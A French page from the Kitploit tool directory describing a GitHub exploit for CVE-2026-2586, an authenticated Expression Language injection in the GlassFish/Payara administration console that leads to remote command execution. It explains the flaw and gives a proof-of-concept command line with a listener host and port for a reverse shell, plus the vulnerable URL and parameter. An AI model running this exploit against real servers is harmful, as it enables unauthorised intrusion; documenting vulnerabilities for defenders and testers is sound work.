Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-2586 — Exploit d'injection EL authentifié pour la console d'administration GlassFish/Payara permettant l'exécution de commandes à distance via des paramètres spécialement conçus dans le flux de configuration du serveur virtuel. | Kitploit
Outils/GitHubGitHub/deepsecurityresearch/cve-2026-2586
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubdeepsecurityresearch/cve-2026-2586

CVE-2026-2586

Exploit d'injection EL authentifié pour la console d'administration GlassFish/Payara permettant l'exécution de commandes à distance via des paramètres spécialement conçus dans le flux de configuration du serveur virtuel.

Voir le dépôt
21il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RCE par injection EL dans GlassFish authentifié (CVE-2026-2586)

Une vulnérabilité d'injection de langage d'expression (Expression Language) dans la console d'administration GlassFish permet à un utilisateur authentifié d'injecter des expressions EL malveillantes dans des paramètres traités par l'interface d'administration web. Une exploitation réussie peut conduire à l'exécution de commandes à distance sur le serveur concerné.

La vulnérabilité a été identifiée dans le flux d'édition de la configuration virtuelle du serveur, où des paramètres contrôlables par l'utilisateur sont interprétés de manière non sécurisée par l'application.

Cela se produit parce que :

  • L'interface d'administration traite des paramètres contrôlables par l'utilisateur au sein d'expressions EL.
  • L'entrée n'est pas correctement validée ou neutralisée avant d'être interprétée par le backend.
  • Un utilisateur authentifié de la console d'administration peut abuser du comportement vulnérable pour invoquer des classes et méthodes Java.
  • Dans un scénario d'exploitation réussi, un attaquant disposant d'identifiants valides pourrait exécuter des commandes sur le système d'exploitation sous-jacent.

Composant affecté

  • Produit : GlassFish / Payara Administration Console
  • CVE : CVE-2026-2586
  • Type : Injection de langage d'expression (EL Injection)
  • Impact : Exécution de code à distance authentifiée
  • Vecteur : Interface d'administration web

Preuve de concept

Le test a été effectué dans un environnement local et contrôlé.

root@kitploit:~
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure

URL vulnérable :

https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true

Légal

UTILISATION AUTORISÉE UNIQUEMENT. DeepSecurity Perú n'approuve pas l'accès non autorisé et décline toute responsabilité en cas d'utilisation abusive des informations fournies.

Télécharger l’outil